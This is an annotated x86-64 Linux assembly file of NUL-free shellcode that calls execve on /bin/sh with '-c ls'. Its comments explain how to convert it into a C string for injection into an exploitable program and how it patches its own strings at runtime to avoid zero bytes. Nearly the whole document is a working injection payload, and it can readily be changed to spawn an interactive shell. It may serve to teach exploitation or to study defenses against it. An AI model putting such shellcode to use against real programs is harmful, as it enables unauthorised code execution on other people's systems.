# This shell code program could be converted to a C style string using:
#
# as --64 shellcode.s -o shellcode.o
# ld shellcode.o -o shellcode
# objcopy -j.text -O binary shellcode shellcode.bin
# hexdump -v -e '"\\""x" 1/1 "%02x" ""' shellcode.bin
# This shell code program can't be run directly but it will operate as shellcode
# once converted to a string and injected into an exploitable program. This code
# is designed to avoid any NUL(0x00) byte characters being generated.
#
# Syntax/target: GNU as, AT&T syntax, x86-64 Linux (raw syscall, no libc).
# Effect:        execve("/bin/sh", {"/bin/sh", "-c", "ls", NULL}, NULL)
# Registers:     rax = 0 then syscall number; rdi = filename; rsi = argv; rdx = envp.
# Clobbers:      rax, rdi, rsi, rdx, flags; rcx and r11 are clobbered by `syscall`.
# Stack:         four qwords are pushed (argv array + NULL terminator) and never popped;
#                a successful execve never returns, so the stack is not restored.
# Note:          the strings are stored inside .text and patched at runtime (see
#                overdata). In the ld-linked ELF, .text is mapped read-only and
#                executable, so those stores fault — presumably the reason the note
#                above says it "can't be run directly". Any W^X (non-writable code)
#                mapping defeats the runtime patching.
        .section .text
        .globl  _start
_start:
        jmp     overdata                # Mix code and DATA in same segment: skip over the strings below
# Generate all the strings without a NUL(0) byte. We will replace the 0xff with 0x00 in the code
name:       .ascii "/bin/sh"            # Program to run (also used as argv[0])
name_nul:   .byte  0xff                 # This 0xff will be replaced by 0x00 in the code
arg1:       .ascii "-c"                 # Program argument
arg1_nul:   .byte  0xff                 # This 0xff will be replaced by 0x00 in the code
arg2:       .ascii "ls"                 # Program Argument
arg2_nul:   .byte  0xff                 # This 0xff will be replaced by 0x00 in the code
overdata:
        xor     %eax, %eax              # RAX = 0 (writing eax zero-extends; no NUL in the encoding)
# All references to the data before our code are RIP-relative. RIP-relative addressing
# always encodes a 32-bit displacement (there is no 1-byte form); because the targets
# lie *before* the referencing instruction, the displacement is a small negative value
# whose upper bytes are 0xff, so no NUL(0) byte appears in the code. RIP-relative
# addressing also keeps the code position independent once loaded in memory.
# Zero terminate each of the strings (these are stores into the code region itself).
        mov     %al, arg2_nul(%rip)     # "ls\0"
        mov     %al, arg1_nul(%rip)     # "-c\0"
        mov     %al, name_nul(%rip)     # "/bin/sh\0"
        lea     name(%rip), %rdi        # RDI = pointer to program name string (execve filename)
        push    %rax                    # NULL terminate the program argument array (argv[3] = NULL)
        leaq    arg2(%rip), %rsi
        push    %rsi                    # Push the address of the 3rd program argument on stack (argv[2] = "ls")
        lea     arg1(%rip), %rsi
        push    %rsi                    # Push the address of the 2nd program argument on stack (argv[1] = "-c")
        push    %rdi                    # Push the address of the program name on stack as 1st argument (argv[0])
        mov     %rsp, %rsi              # RSI = Pointer to the program argument array (argv)
        mov     %rax, %rdx              # RDX = 0 = NULL envp parameter
        mov     $59, %al                # RAX = execve system call number; 8-bit write keeps the imm NUL-free
        syscall                         # execve(rdi, rsi, rdx); does not return on success